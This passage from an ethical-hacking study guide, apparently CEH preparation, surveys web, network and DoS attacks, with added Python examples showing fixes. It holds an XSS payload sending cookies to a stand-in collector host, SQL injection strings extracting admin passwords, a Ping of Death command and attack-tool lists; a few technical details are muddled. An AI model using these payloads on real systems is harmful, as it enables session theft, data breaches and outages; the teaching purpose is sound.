Hidden value fields are embedded inside the HTML code. The theory is that if end users cannot see a field, it is safe from tampering. The flaw in that logic is that anyone who views the page source can see the hidden fields. Many sites use hidden fields to store the price of the product that is passed to the web application. If the attacker saves the web page locally, modifies the amount and submits the form, the new value is passed to the web application. If no server-side validation is performed, the application accepts the manipulated value. Anything a browser sends back, hidden or not, is under the user's control.
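The price-tampering case above in code, as an added example that is not part of the original material. The Python below processes the same posted form two ways: the vulnerable handler trusts the hidden price the browser returned, the fixed handler looks the price up in a server-side catalog and only accepts what the client may legitimately choose. It also shows the fallback for values that genuinely must round-trip through the client: sign them with an HMAC so tampering is detected. The catalog, SKU and key are hypothetical.

```python
import hashlib
import hmac
from urllib.parse import parse_qs

# Hypothetical catalog (price in cents) and server-side signing key.
CATALOG = {"sku-100": 4999}
SECRET = b"server-side-secret-rotate-me"

# What the browser posts from the unmodified page, and from a copy saved to
# disk with the hidden price field edited.  Constructed for the example.
HONEST_POST = "sku=sku-100&price=4999&qty=1"
TAMPERED_POST = "sku=sku-100&price=1&qty=1"


def checkout_vulnerable(form):
    """Trusts the hidden 'price' field the browser sent back."""
    sku = form["sku"][0]
    price = int(form["price"][0])
    qty = int(form.get("qty", ["1"])[0])
    return {"sku": sku, "total": price * qty}


def checkout_fixed(form):
    """Looks the price up server-side; the client only chooses what and how
    many, and even those choices are range-checked."""
    sku = form["sku"][0]
    if sku not in CATALOG:
        raise ValueError("unknown sku")
    qty = int(form.get("qty", ["1"])[0])
    if not 1 <= qty <= 100:
        raise ValueError("bad quantity")
    return {"sku": sku, "total": CATALOG[sku] * qty}


def sign_hidden(fields):
    """HMAC over a canonical serialization of the hidden fields.  Emit this
    alongside them so the server can verify nothing was edited in transit."""
    payload = "&".join(f"{k}={v}" for k, v in sorted(fields.items()))
    return hmac.new(SECRET, payload.encode(), hashlib.sha256).hexdigest()


def verify_hidden(fields, signature):
    """Constant-time comparison so the check itself leaks nothing."""
    return hmac.compare_digest(sign_hidden(fields), signature)


if __name__ == "__main__":
    print("vulnerable, tampered:", checkout_vulnerable(parse_qs(TAMPERED_POST)))
    print("fixed, tampered:     ", checkout_fixed(parse_qs(TAMPERED_POST)))
    fields = {"sku": "sku-100", "price": "4999"}
    sig = sign_hidden(fields)
    print("signature verifies:  ", verify_hidden(fields, sig))
    print("edited copy verifies:", verify_hidden({"sku": "sku-100", "price": "1"}, sig))
```

The signing approach protects integrity, not secrecy: the user can still read the signed value, so it is the right tool for a price or a record ID that must not be altered, never for something that must stay hidden.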

Cross Site Scripting

Another popular web application attack is cross-site scripting (XSS). A web application that echoes user-supplied input into its pages without encoding it lets an attacker inject script that runs in the victim's browser within the site's own security context, where it can read the session cookie. Sites that identify a user by a cookie alone are therefore exposed. The attack is typically committed by sending the victim an Email with a malicious link embedded; victims who fall for the ruse and click the link have their credentials stolen. Sites running PHP-Nuke have been particularly hard hit by this attack.

Cross-Site Scripting Countermeasures

This attack, like others, can be prevented. Consider the following:

Patch the program

Validate all input that your dynamic page receives, and HTML-encode untrusted data when writing it into a page

Mark session cookies HttpOnly so that script in the page cannot read them

Be leery of embedded links

Disable scripting language support in the browser (a client-side measure)
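The attack and the two server-side countermeasures above, as an added example that is not part of the original material. The Python below models a search page that echoes its query: the vulnerable renderer reflects the payload as live markup, the safe renderer HTML-encodes it, and the cookie helper shows the HttpOnly attribute that keeps document.cookie empty for injected script even when encoding is missed somewhere. The collector host and site URL are hypothetical.

```python
import html
from urllib.parse import quote

# Payload of the kind delivered in a mailed link: loads an image from the
# attacker's collector with the victim's cookie in the query string.
# collector.example is a hypothetical host.
PAYLOAD = '<script>new Image().src="http://collector.example/c?"+document.cookie</script>'


def render_vulnerable(q):
    """Reflects the query straight into the page: script executes."""
    return f"<p>Results for: {q}</p>"


def render_safe(q):
    """Same page, with the query HTML-encoded: the browser shows the text
    of the payload instead of running it."""
    return f"<p>Results for: {html.escape(q, quote=True)}</p>"


def phishing_link(base_url):
    """The URL an attacker mails out; the payload rides in the q parameter."""
    return f"{base_url}/search?q={quote(PAYLOAD, safe='')}"


def session_cookie(value, http_only=True):
    """Set-Cookie header for the session.  With HttpOnly the cookie is still
    sent on requests but is invisible to document.cookie, so the payload
    above exfiltrates nothing even if it does run."""
    attrs = ["Path=/", "Secure", "SameSite=Lax"]
    if http_only:
        attrs.append("HttpOnly")
    return "Set-Cookie: session=" + value + "; " + "; ".join(attrs)


def contains_active_script(page):
    """Crude check a response filter might apply: any live <script> tag."""
    return "<script" in page.lower()


if __name__ == "__main__":
    print(phishing_link("https://shop.example"))
    print(render_vulnerable(PAYLOAD))
    print(render_safe(PAYLOAD))
    print(session_cookie("abc123"))
```

Encoding on output is the fix for the injection itself; HttpOnly limits the damage when the fix is missed, and neither replaces the other.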

Web Based Password Cracking Techniques

Authentication Types

Authentication types include:

Basic

Digest

Certificate

Microsoft Passport

Forms based

You should be familiar with the details of each of these authentication types; Basic, for instance, sends the credentials Base64-encoded on every request and is only safe over HTTPS.


Web-based Password Cracking

There are countless tools available for attacking web-based authentication. If the site does not employ a lockout or rate-limiting policy, it is only a matter of time and bandwidth before the attacker gains entry. Some of these password-cracking tools are WebCracker, Brutus, ObiWan, Munga Bunga, Variant and PassList.

Stealing Cookies

If the attacker can gain physical access to the victim's computer, various tools can be used to steal cookies or to reveal passwords hidden behind asterisks in dialog boxes. These include CookieSpy and SnadBoy's Revelation.

Buffer Overflows

Poorly written programs that lack bounds checking cause buffer overflows. Any time bad data entered into an application causes it to crash, blue-screen or drop to a root prompt, there is a problem. Buffer overflows can result in:

Attackers running their own code with the privileges of the vulnerable program

Freezing, rebooting, data corruption or lockup of the attacked system

Exploitation

Many of today's most popular attacks are the result of buffer overflows. These include:

Jill-Win32 – IIS (IPP) buffer overflow attack

SQL2.exe – SQL Server buffer overflow attack

WSFTP – DoS buffer overflow attack

Named NXT – BIND buffer overflow attack

While you may never write a buffer overflow exploit, you should be familiar with its structure.

Detecting Buffer Overflows

There are two primary ways to detect buffer overflows:

Proactive – have an experienced programmer (or a static analysis tool) review the code to verify that every copy into a buffer is bounded;

Reactive – after the program is released, find the flaw by feeding it long strings of data and observing its reaction (fuzzing), or by waiting for an attacker to do so.

Skills Required to Exploit Buffer Overflows

The skills required to exploit a buffer overflow include:

Knowledge of the Stack

Assembly Language

C Programming

The ability to guess key parameters


Defense Against Buffer Overflows

The best defence against buffer overflows is to start with a robust and secure program. Bounded C library calls (strncpy, snprintf and the like) should be used instead of their unbounded counterparts, and the finished code should be audited. When dealing with precompiled programs, always make sure the latest patches are applied and that the program runs with the least possible privilege.

Tools for Compiling Robust Code

Some of the tools available to help produce robust code include:

StackGuard

Immunix

Stack protection of this kind is now built into mainstream compilers, for example GCC's -fstack-protector.

IDS, Firewalls & Honeypots

Intrusion Detection Systems

An IDS can be software or hardware based. Some are simple software applications, others are high-end hardware products. Whatever the platform, they share a common purpose: to monitor events on hosts or networks and notify security administrators in the event of an anomaly. IDSs come in two basic types:

Anomaly detection

Signature recognition

Anomaly Detection

This method works by looking for traffic that is outside the bounds of normal traffic. While it works well, it can be fooled by slowly changing traffic patterns, which can train the IDS into believing the illicit traffic is acceptable.

Signature Recognition

This method works by comparing traffic to known attack signatures. It is only as effective as its most recent update: it cannot detect an attack that is not in its database. While signature- and anomaly-based IDSs are the most commonly deployed types, other tools, such as honeypots, are also useful in detecting potential security breaches.

IDS Signature Matching

Signature matching works by capturing traffic and examining it for compliance with known:

Protocol stack rules

Application protocol rules


IDS Software Vendors

There are many IDS vendors. As a security administrator, your biggest concern should be who will watch over and administer the IDS. As someone once put it, "IDSs are like three-year-old children: they require constant attention." If you cannot provide that amount of attention and manpower, consider outsourcing the task to a qualified third party. Some well-known IDS products include Snort, CyberCop, RealSecure and BlackICE.

Evading IDS

An attacker can use a host of programs to try to evade an IDS. He may even encrypt his traffic so that the IDS cannot analyse its content. Tools an attacker may use to fool an IDS include Fragrouter, TCPReplay, SideStep, NIDSbench and ADMutate.

Hacking Through Firewalls

Firewalls function primarily by one of the following three methods:

Packet filtering (stateless, or stateful inspection)

NAT

Proxy

While it is not always possible to hack through a firewall, there are tools and techniques for determining its presence, manufacturer and rule set. As an example, when a traceroute shows the same IP address for the two final hops, you are probably dealing with a stateful inspection firewall. At this point you may want to try to connect: many firewalls divulge their presence simply by answering a connection. Use tools such as Telnet and FTP to attempt a banner grab from the firewall. Firewalk can be used to enumerate the firewall's rule set further; it works by tuning the IP TTL so that packets expire one hop beyond the gateway, so a TTL-exceeded reply from that hop proves the gateway let the packet through. Finally, Nmap is another valuable tool that should not be overlooked. It too can enumerate the firewall: whether a port is reported open, closed or filtered tells the attacker a lot about the firewall's architecture. Filtered is commonly reported when Nmap receives no response at all or an ICMP type 3 code 13 (communication administratively prohibited) response. See RFC 792 to learn more about how ICMP functions:

http://www.faqs.org/rfcs/rfc792.html

Placing Backdoors Behind Firewalls

A much easier technique than hacking through the firewall, is to simply place a backdoor behind it.

Firewalls cannot deny what they must permit. There will usually be several ports open for the

skilled attacker to use. These include:

UDP 53 – DNS

TCP 25 – SMTP

TCP 80 – HTTP

ICMP 0/8 – Ping

Hiding Behind Covert Channels

Using one of these open ports is a good way for the attacker to covertly send data out of the


organization. Some of the tools commonly used here include:

NetCat – Can use any TCP/UDP open port

CryptCat – Same as NetCat, but carries the payload in an encrypted format

AckCmd – Uses TCP ACKs as a covert channel

Loki – Uses ICMP as a covert channel. Looks like common ping traffic

Reverse WWW Shell – Uses HTTP as a covert channel

Honeypots

Honeypots are systems that contain phony files, services, and databases. They are deployed to distract the attacker from the real target and to give the administrator enough time to be alerted. For these lures to be effective, they must adequately persuade the attacker that he has discovered a real system. Products such as Network Associates' CyberCop Sting simulate an entire network, including routers and hosts, that is actually located on a single computer.

Honeypot Vendors

There are many honeypot vendors. The two most important issues with honeypots are entrapment

and enticement. Some honeypot vendors are listed below for your review. Each link offers good

information about this fascinating subject.

Deception Toolkit - http://www.all.net/dtk/index.html

HoneyD - http://www.citi.umich.edu/u/provos/honeyd/

LaBrea Tarpit - http://www.hackbusters.net

ManTrap - http://www.symantec.com

Single-Honeypot - http://www.sourceforge.net/projects/single-honeypot/

Smoke Detector - http://palisadesys.com/products/smokedetector/

Specter - http://www.specter.ch

Cryptography

PKI

Public key infrastructure provides a variety of valuable security services, such as key management, authorization, and message integrity through the use of digital signatures. PKI also adds a fourth basic feature, non-repudiation, to the security triad:

Confidentiality

Integrity

Authentication

Non-repudiation

X.509 is one of the key standards that govern the use of PKI.

Digital Certificates

A digital certificate is a record used for authentication and encryption. It serves as a basic component of PKI. RSA is the default encryption standard used with digital certificates, and when a certificate is requested from a CA (Certificate Authority), the request is comprised of the following four fields:

The DN (Distinguished Name) of the CA

The Public key of the user

Algorithm identifier

The user's digital signature

RSA is a public key cryptosystem in which one key is used for encryption (the public key) and the other is used for decryption (the private key). RSA (Rivest, Shamir, Adleman) was developed in 1977 to help secure Internet transactions.

Hashing Algorithms

Hashing algorithms can be used for digital signatures or to verify the validity of a file. Hashing is a one-way process and is widely used.

MD5 – 128-bit message digest

SHA – 160-bit message digest
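The points above (a fixed-size digest standing in for the message, the private key producing the signature and the public key checking it) as an added, runnable example that is not from the study material. It uses textbook RSA with two constructed Mersenne primes and SHA-1; the key size and the lack of padding are for demonstration only.

```python
import hashlib

# Constructed demo key: two Mersenne primes (2^127-1 and 2^89-1) give a
# modulus of about 216 bits, comfortably larger than a 160-bit SHA-1 digest.
# Real deployments use 2048-bit or larger keys plus a padding scheme (e.g. PSS).
P = 2**127 - 1
Q = 2**89 - 1
N = P * Q                               # public modulus
E = 65537                               # public exponent
D = pow(E, -1, (P - 1) * (Q - 1))       # private exponent, kept secret by the signer


def digest_bits(algorithm, data):
    """Size of the message digest in bits: MD5 gives 128, SHA-1 gives 160."""
    return hashlib.new(algorithm, data).digest_size * 8


def sha1_as_int(message):
    """One-way step: the message is reduced to a 160-bit number before signing."""
    return int.from_bytes(hashlib.sha1(message).digest(), "big")


def sign(message, d=D, n=N):
    """Hash the message, then apply the private key (textbook RSA, no padding)."""
    h = sha1_as_int(message)
    assert h < n, "digest must be smaller than the modulus"
    return pow(h, d, n)


def verify(message, signature, e=E, n=N):
    """Anyone holding the public key (e, n) can check the signature; a changed
    message hashes differently, so integrity and origin are checked together."""
    return pow(signature, e, n) == sha1_as_int(message)


if __name__ == "__main__":
    msg = b"transfer 100 to account 42"        # constructed sample message
    sig = sign(msg)
    print("MD5 bits:", digest_bits("md5", msg), "SHA-1 bits:", digest_bits("sha1", msg))
    print("valid on original :", verify(msg, sig))
    print("valid on tampered :", verify(b"transfer 900 to account 42", sig))
```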

SSL

Netscape developed SSL (Secure Sockets Layer) and almost all browsers and web servers support it. SSL's focus is on securing web transactions. The client is responsible for creating the session key after the server's identity has been verified. SSL is limited in strength by the cryptographic tools on which it is based.

PGP

PGP (Pretty Good Privacy) is a public-key encryption package that allows individuals to encrypt e-mail and other personal data.

SSH

SSH (Secure Shell) is an excellent replacement for Telnet and FTP. It operates on port 22 and is

available in two versions: SSH and SSH2.

Session Hijacking

Spoofing Vs Hijacking

Spoofing is the act of masquerading as another user, whereas session hijacking attempts to attack and take over an existing connection. The attacker will typically intercept the established connection between the authorized user and the service. The attacker will then take over the session and assume the identity of the authorized user. Session hijacking attacks can range from basic sniffing, to capture the authentication between a client and server, to hijacking the established session to trick the server into thinking it still has a legitimate session with the authorized user.

Session Hijacking Steps

To successfully hijack a session, several items must fall into place:

The attacker must be able to track and intercept the traffic

The attacker must be able to desynchronize the connection

The attacker must be able to inject his traffic in place of the victim's

If successful, the attacker can then simply sit back and observe, or actively take over the connection.

Passive Session Hijacking – The process of silently sniffing the data exchange between the user and the server.

Active Session Hijacking – The process of killing the victim's connection and hijacking it for malicious intent.

TCP Concepts

To understand hijacking, you must know how TCP functions. As TCP is a reliable service, a 3-step startup is performed before data is transported.

TCP 3-step startup

Before two computers can communicate, TCP must set up the session. This setup is comprised of three steps. Once these three steps are completed, the two computers can exchange data. The 3-step startup is shown below:

Client --- SYN ---> Server

Client <--- SYN/ACK --- Server

Client --- ACK ---> Server

Sequence Numbers

During the first two steps of the three-step startup, the two computers that are going to

communicate exchange sequence numbers. These numbers enable each computer to keep track of

how much information has been sent and the order in which the packets must be reassembled. An

attacker must successfully guess the sequence number to hijack the session.


Session Hijacking Tools

There are many tools available to hijack a session. Some of these tools include:

Juggernaut

Hunt

SolarWinds

TCP Session Reset Utility

Session Hijacking Countermeasures

Session hijacking is not one of the easiest attacks for an attacker to complete. It can, however, have disastrous results for the victim if successful. Organizations should consider replacing clear text protocols, such as FTP and Telnet, with more secure protocols such as SSH. Also, administrative controls such as time stamps, sequence numbers, and digital signatures can be used to prevent replay attacks.

SQL Injection

Some organizations are so focused on their web servers that they may never realize that the attacker has another target in mind. The organization's most valuable assets are not on the web server, but contained within the company's database. This juicy target can contain customer data, credit card numbers, passwords, or other corporate secrets. Attackers search for and exploit databases that are susceptible to SQL injection. SQL injection occurs when an attacker is able to insert SQL statements into a query by means of a SQL injection vulnerability.

SQL injection, as the name suggests, is a type of security attack in which the attacker injects specially crafted Structured Query Language (SQL) code through a web browser to gain access to resources or to make changes to the data. It is a technique of injecting SQL commands to exploit non-validated input loopholes in a web application's database. Programmers build SQL commands directly from user input, making it easy for attackers to inject commands quickly and accurately. The attack takes advantage of unsafe queries in web applications that build dynamic SQL queries.

SQL Insertion Discovery

Attackers typically scan for port 1433 to find Microsoft SQL databases. Once one is identified, the attacker will place a single quote (') inside a username field to test for SQL vulnerabilities. The attacker will look for a returned result similar to the one shown below:

Microsoft OLE DB Provider for SQL Server error '80040e14'

Unclosed quotation mark before the character string ' and Password=''.

/login.asp, line 42

This informs the attacker that SQL injection is possible. At this point, the attacker can shut down the server, execute commands, extract the database, or do just about anything else he wants to do.


SQL Injection Vulnerabilities

SQL servers are vulnerable because of poor coding practices, lack of input validation, and the

failure to update and patch the service. The two primary vulnerabilities are:

Unpatched Systems

Blank sa Password

Steps for performing SQL Injection

Now the most common question that arises is what tool one would require to carry out a SQL attack. The answer is quite simple: any web browser is good enough for a SQL attack.

How to do a SQL attack?

First of all, look for pages that allow the user to submit data, such as login pages, search pages, feedback forms, etc. If we have an HTML page, check the source code to see whether it is using POST or GET; look for the <Form> tag in the source code:

<Form action=search.asp method=post>

<input type=hidden name=X value=Z>

</Form>

If not, check for pages like ASP, JSP, CGI, or PHP.

Example:

Check a URL that takes parameters, such as the following:

http://www.xsecurity.com/index.asp?id=10

In the above example, attackers might attempt:

http://www.xsecurity.com/index.asp?id=blah' or 1=1--

SQL Injection Techniques

In SQL injection, the hacker uses SQL queries and creativity to get to the database of sensitive corporate data through the web application. SQL, or Structured Query Language, is the computer language that allows you to store, manipulate, and retrieve data stored in a relational database (a collection of tables which organize and structure data). SQL is, in fact, the only way that a web application (and its users) can interact with the database. Examples of relational databases include Oracle, Microsoft Access, MS SQL Server, MySQL, and FileMaker Pro, all of which use SQL as their basic building block.

SQL commands include SELECT, INSERT, DELETE and DROP TABLE. DROP TABLE is as ominous as it sounds and will in fact eliminate the table with a particular name.

In the legitimate scenario of the login page example above, the SQL commands planned for the web application may look like the following:

SELECT count(*)

FROM users_list_table

WHERE username='FIELD_USERNAME'

AND password='FIELD_PASSWORD'

In plain English, this SQL command (from the web application) instructs the database to match the username and password input by the legitimate user against the combination it has already stored. Each type of web application is hard coded with specific SQL queries that it will execute when performing its legitimate functions and communicating with the database. If any input field of the web application is not properly sanitized, a hacker may inject additional SQL commands that broaden the range of SQL commands the web application will execute, thus going beyond the original intended design and function. A hacker will thus have a clear channel of communication (or, in layman's terms, a tunnel) to the database, irrespective of all the intrusion detection systems and network security equipment installed in front of the physical database server. To test a site for SQL injection, use a single quote in the input:

blah' or 1=1--

Login: blah' or 1=1--

Password: blah' or 1=1--

The next big thing is: how to retrieve any data? To get the login_name from the "admin_login" table:

http://xsecurity.com/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--

From the above, you get the login_name of the admin user. To get the password for login_name="yuri":

http://xsecurity.com/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login WHERE login_name='yuri'--

Tools for SQL Injection

Wpoison

Pearlscript

SQLDict

SqlExec


SQLbf

SQLSmack

SQL2.exe

AppDetective

Database Scanner

SQLPoke

NGSSQuirreL

SQLPing v2.2

Preventing SQL Injection

Preventing SQL injection is best achieved through the techniques discussed above. You should also make sure that the application is running with only enough rights to do its job and that it implements error handling, so that when the system detects an error, it will not provide the attacker with any usable information.
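The page's login query built two ways, vulnerable by string concatenation and hardened with placeholders plus the error handling recommended above, as an added example that is not from the study material. The in-memory users_list_table, its rows and the SQLite backend are constructed for the demo.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the page's users_list_table (in memory)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users_list_table (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users_list_table VALUES (?, ?)",
                     [("yuri", "s3cret"), ("alice", "hunter2")])
    return conn


def login_vulnerable(conn, username, password):
    """The page's count(*) query built by concatenation: user input becomes SQL."""
    query = ("SELECT count(*) FROM users_list_table "
             f"WHERE username='{username}' AND password='{password}'")
    return conn.execute(query).fetchone()[0] > 0


def login_parameterized(conn, username, password):
    """Same query with placeholders: the driver sends the input as data, so the
    quote and the -- comment in a payload are compared literally, never parsed."""
    query = ("SELECT count(*) FROM users_list_table "
             "WHERE username=? AND password=?")
    return conn.execute(query, (username, password)).fetchone()[0] > 0


def login_hardened(conn, username, password):
    """Parameterized plus error handling: callers only ever see True or False,
    never the driver's error text that the discovery step on the page relies on."""
    try:
        return login_parameterized(conn, username, password)
    except sqlite3.Error:
        return False


PAYLOAD = "blah' or 1=1--"   # the probe string quoted on the page


if __name__ == "__main__":
    db = make_db()
    print("vulnerable   :", login_vulnerable(db, PAYLOAD, PAYLOAD))     # True: check bypassed
    print("parameterized:", login_parameterized(db, PAYLOAD, PAYLOAD))  # False
    try:
        login_vulnerable(db, "'", "x")
    except sqlite3.Error as exc:
        print("single quote leaks an error:", exc)
    print("hardened     :", login_hardened(db, "'", "x"))               # False, no leak
```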

SQL Injection in Oracle

UNIONS can be added to the existing statement to execute a second statement

SUBSELECTS can be added to existing statements

Data Definition Language (DDL) can be injected if DDL is used in a dynamic SQL string

INSERTS, UPDATES, and DELETES can also be injected

Anonymous PL/SQL block in procedures

SQL Injection in MySql

It is not easy to perform SQL injection in a MySQL database. While coding with a MySQL application, the injection vulnerability is not exploited. It is difficult to trace the output. You can see an error because the value retrieved is passed on to multiple queries with different numbers of columns before the script ends. In such situations, SELECT and UNION commands cannot be used.

8. NETWORK ATTACKS

Sniffers

A sniffer or packet analyzer can be software or hardware based. Its function is to capture and

decode network traffic. Sniffers typically place the NIC into promiscuous mode. Captured

traffic can be analyzed to determine problems in a network such as bottlenecks or performance

degradation. Sniffers can also be used by an attacker or unauthorized individual to capture clear

text passwords and data from the network. Protocols such as FTP, Telnet, and HTTP are

especially vulnerable as they pass all usernames and passwords in clear text.


Passive Sniffing

Passive sniffing is made possible through the use of hubs. As hubs treat all ports as one giant collision domain, all traffic is visible. Unfortunately for the attacker, most modern networks no longer use hubs. This makes the capture of unauthorized traffic more difficult, unless the attacker is sniffing a wireless network, which acts as a hub rather than a switch.

Active Sniffing

Switches do not operate like hubs. By default, they make each physical port a separate collision

domain. Therefore, active sniffing requires that the switch be manipulated in some fashion. The

objective is to force the switch to pass the attacker the needed traffic. Otherwise, the attacker

will only see the traffic bound for his particular port or broadcast traffic, which by default, is

passed to all ports.

Generic Sniffing Tools

These tools allow you to view real-time packet captures and configure filters for pre/post filtering.

Once the data is captured, these programs allow you to interactively view each packet and its

individual headers. Descriptions of the packet headers are summarized. Most will also allow you

to reconstruct individual TCP streams. Some of these programs are freely available, while others

are quite expensive.

WinDump – A Windows based command line TCPDump program

TCPDump – The most well-known Unix based sniffing program

Ethereal – A great GUI TCP/IP sniffer. It is free and available at http://www.ethereal.com

EtherPeek – A commercial grade sniffer developed by WildPackets

Specialized Sniffing Tools

Unlike the generic tools listed above, these tools capture specific types of traffic. These are

optimized for hacking and penetration testing as all the non-essential information has been

removed.

DSniff – Captures clear text usernames and passwords.

Mailsnarf – Optimized to capture clear text mail information.

URLsnarf – Builds a list of all browsed URLs.

Webspy – Opens the URL the victim is browsing on the attacker's computer.

Cain – Sniffs traffic, captures/cracks passwords, and enumerates Windows networks.

Ettercap – Multipurpose sniffer/interceptor/logger for switched LANs.

Overcoming Switched Networks

Sniffing traffic on a switched network can be accomplished through one of two ways: Flooding or

ARP Spoofing.


Flooding

Flooding is simply the process of sending the switch more MAC addresses than its CAM (Content Addressable Memory) table can hold. Some, but not all, switches that are flooded with such a high amount of traffic will fail open. Simply stated, these devices will begin to function as a hub, passing all traffic to all ports. One of the programs an attacker may use to attempt this technique is EtherFlood.

ARP Spoofing

This technique corrupts the ARP protocol to attempt the redirection of switched traffic. Normally, ARP is used to resolve known IP addresses to unknown MAC addresses. Once the ARP protocol has performed this resolution, the result is stored in the ARP cache. It is kept there for a short period of time to speed up subsequent communications and reduce broadcast traffic. Since ARP is a trusting protocol, a victim's computer will accept an unsolicited ARP response. This unsolicited ARP response can be used to fool the victim's computer into communicating with the wrong device. For the attacker to be successful, he must also fool the switch and enable IP forwarding to move the data from his computer to its true destination. At this point, he will have successfully placed himself in the traffic stream and can capture all forthcoming data transmissions. Several programs are available that can accomplish this attack. One such program is

MAC Spoofing

MAC spoofing tools allow the attacker to pretend to be another physical device. This type of

attack may be used in situations where switch ports are locked by MAC address. These tools are

available for Windows and Linux. Some can even be used to spoof wireless network cards.

Macof – Floods the network with random MAC addresses

SMAC – Windows MAC address spoofing tool

MAC Changer – Linux MAC address spoofing tool

DNS Spoofing

DNS spoofing is a hacking technique used to inject DNS servers with false information. It enables malicious users to redirect victims to bogus websites, or can be used for denial of service attacks. A good understanding of DNS and zone files is required to pass the CEH exam. Zone files contain SOA, NS, A, CNAME, and MX records. Other DNS record types include PTR, HINFO, and MINFO. The two basic approaches to DNS spoofing are:

Hijack the DNS query and redirect the victim to a bogus site

Hack the DNS server, thereby, forcing it to provide a false response to a DNS query

Two of the tools available to the attacker to perform DNS spoofing are:

WinDNSSpoof

Distributed DNS Flooder


Detecting Sniffers and Monitoring Traffic

It is not easy to detect sniffers on the network. Organizations should make sure their policies disallow unauthorized sniffers. There should also be a heavy penalty placed on those found to be in violation of such policies. There are some tools that can aid the network security administrator in maintaining compliance with this policy, such as SniffDet, IRIS and NetIntercept.

Denial of Service (DOS)

A DoS attack is any type of attack that brings a system offline or otherwise makes a host's service

unavailable to legitimate users. Early DoS attacks were often described as annoying, frustrating,

or a nuisance. Modern DoS attacks have increased in sophistication and can render a network

unusable. These attacks can cost corporations money through lost sales and profits. While it may

be difficult to place an exact monetary figure on DoS attacks, they are costly.

DoS attacks, or Denial of Service attacks, have become very common amongst hackers, who use them as a path to fame and respect in the underground groups of the Internet. A Denial of Service attack basically means denying valid Internet and network users the use of the services of the target network or server. It means launching an attack which will temporarily make the services offered by the network unusable by legitimate users. In other words, one can describe a DoS attack as one in which you clog up so much memory on the target system that it cannot serve legitimate users, or in which you send the target system data packets which it cannot handle, causing it to crash, reboot or, more commonly, deny services to legitimate users.

Common DoS Attacks

Popular DoS attacks can be separated into three categories:

Bandwidth

Protocol

Logic

Common DoS Attack Strategies

No matter the type, the end result is the same, loss of service for the legitimate users. Some of the

more common DoS attack strategies are: Ping of Death, SSPing, Land, Smurf, SYN Flood, Win

Nuke, Jolt2, Bubonic, Targa, and Teardrop.

Common DDoS(Distributed DoS) Attacks

DDoS software has matured beyond the point where it can only be used by the advanced attacker. The most powerful DDoS programs are open source code. While these programs reside in the virtual space of the Internet, programmers tweak them, improve them, and add features to each successive iteration. Some common DDoS attack tools are:

Trin00, TFN, TFN2K, Stacheldraht, Shaft and Mstream.


DDoS Attack Sequence

DDoS attacks follow a two-prong attack sequence:

Mass Intrusion

Attack Phase

DoS attacks are of the following types:

Those that exploit vulnerabilities in the TCP/IP protocol suite.

Those that exploit vulnerabilities in the IPv4 implementation.

Brute force attacks, which try to use up all the resources of the target system and make its services unusable.

Some common TCP/IP vulnerabilities are Ping of Death, Teardrop, SYN attacks and Land attacks.

Ping of Death

This vulnerability is quite well known and was formerly used to hang remote systems (or even force them to reboot) so that no users could use their services. This exploit no longer works, as almost all system administrators will have upgraded their systems, making them safe from such attacks. In this attack, the target system is pinged with a data packet that exceeds the maximum size allowed by TCP/IP, which is 65,536 bytes. This would almost always cause the remote system to hang, reboot or crash. This DoS attack could be carried out even from the command line, in the following manner:

The following ping command creates a giant datagram of size 65540 for ping. It might hang the victim's computer:

C:\windows>ping -l 65540

Teardrop

The Teardrop attack exploits a vulnerability in the reassembly of data packets. Whenever data is sent over the Internet, it is broken down into smaller fragments at the source system and put together again at the destination system. Say you need to send 4000 bytes of data from one system to the other; not all of the 4000 bytes are sent in one go. This entire chunk of data is first broken down into smaller parts and divided into a number of packets, with each packet carrying a specified range of the data. For example, say the 4000 bytes are divided into 3 packets, then:

The first Packet will carry data from 1 byte to 1500 bytes

The second Packet will carry data from 1501 bytes to 3000 bytes

The third packet will carry data from 3001 bytes to 4000 bytes


These packets have an OFFSET field in their TCP header part. This offset field specifies from which byte to which byte that particular packet carries data, that is, the range of data it is carrying. This, along with the sequence numbers, helps the destination system reassemble the data packets in the correct order. Now in this attack, a series of data packets is sent to the target system with overlapping offset values. As a result, the target system is not able to reassemble the packets and is forced to crash, hang or reboot.

Say, for example, consider the following scenario (Note: _ _ _ = 1 data packet):

Normally a system receives data packets in the following form, with no overlapping offset values:

_ _ _ _ _ _ _ _ _

(1 to 1500 bytes) (1501 to 3000 bytes) (3001 to 4500 bytes)

Now in a Teardrop attack, the data packets are sent to the target computer in the following format:

_ _ _ _ _ _ _ _ _

(1 to 1500 bytes) (1500 to 3000 bytes) (1001 to 3600 bytes)

When the target system receives something like the above, it simply cannot handle it and will crash, hang or reboot.
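A reassembly check that rejects the overlapping ranges of the Teardrop pattern and the oversized datagram of the Ping of Death described earlier, as an added example that is not from the study material. Byte ranges are 1-based as in the text above; the sender helper and the sizes are constructed for the demo.

```python
# A hardened receiver keeps the invariant that every fragment starts exactly where
# the previous one ended and that the whole never exceeds one legal datagram.
# (In real IPv4 the fragment offset lives in the IP header, in 8-byte units; the
# byte ranges here follow the study material's simplified presentation.)
MAX_DATAGRAM = 65535    # IPv4 total length is a 16-bit field


def split_into_fragments(total_bytes, fragment_size=1500):
    """Constructed well-behaved sender: consecutive, non-overlapping pieces."""
    return [(start, min(start + fragment_size - 1, total_bytes))
            for start in range(1, total_bytes + 1, fragment_size)]


def check_fragments(fragments):
    """fragments: list of (first_byte, last_byte), inclusive and 1-based.
    Returns (accepted, reason) the way a reassembly queue would decide."""
    expected = 1
    for first, last in sorted(fragments):
        if last < first:
            return False, f"fragment {first}-{last} has negative length"
        if first < expected:
            # This piece rewrites bytes already placed: the Teardrop pattern.
            return False, (f"overlap: fragment {first}-{last} overlaps data "
                           f"already covered up to byte {expected - 1}")
        if first > expected:
            return False, f"gap: bytes {expected}-{first - 1} missing"
        expected = last + 1
    total = expected - 1
    if total > MAX_DATAGRAM:
        # Larger than any legal datagram: the Ping of Death pattern.
        return False, f"oversized: {total} bytes exceeds {MAX_DATAGRAM}"
    return True, f"complete datagram of {total} bytes"


if __name__ == "__main__":
    normal = [(1, 1500), (1501, 3000), (3001, 4500)]        # page's normal case
    teardrop = [(1, 1500), (1500, 3000), (1001, 3600)]      # page's attack case
    print("normal  :", check_fragments(normal))
    print("teardrop:", check_fragments(teardrop))
    print("ping -l 65540:", check_fragments(split_into_fragments(65540)))
```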

SYN Attack

